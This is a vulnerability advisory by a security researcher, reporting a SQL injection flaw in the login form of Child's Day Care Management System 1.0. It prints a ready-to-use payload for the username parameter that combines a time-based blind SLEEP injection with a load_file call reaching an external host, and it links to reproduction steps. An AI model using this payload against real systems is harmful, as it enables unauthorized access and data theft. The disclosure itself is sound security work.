Authored by nu11secur1ty

Child’s Day Care Management System version 1.0 appears to be susceptible to a remote SQL injection vulnerability.

## Title: Child's Day Care Management System 1.0 SQL - Injection
## Author: nu11secur1ty
## Date: 12.16.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html


## Description:
The `username` in Login.php app, parameter from Child's Day Care
Management System 1.0 appears to be vulnerable to SQL injection
attacks.
The payload '+(select
load_file('\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.netztd'))+'
was submitted in the username parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. Also, this system is vulnerable to
SQL-Injection-Bypass-Authentication
and XSS-Stored attacks. The attacker can be receiving all information
from the system by using these vulnerabilities! Status: CRITICAL

[+] Payload:

```mysql
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=zCAMOHlX'+(select
load_file('\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.netztd'))+''
AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND
'wBYn'='wBYn&password=a6O!j4g!Z5
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)

## Proof and Exploit:
[href](https://streamable.com/tvbuoi)


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>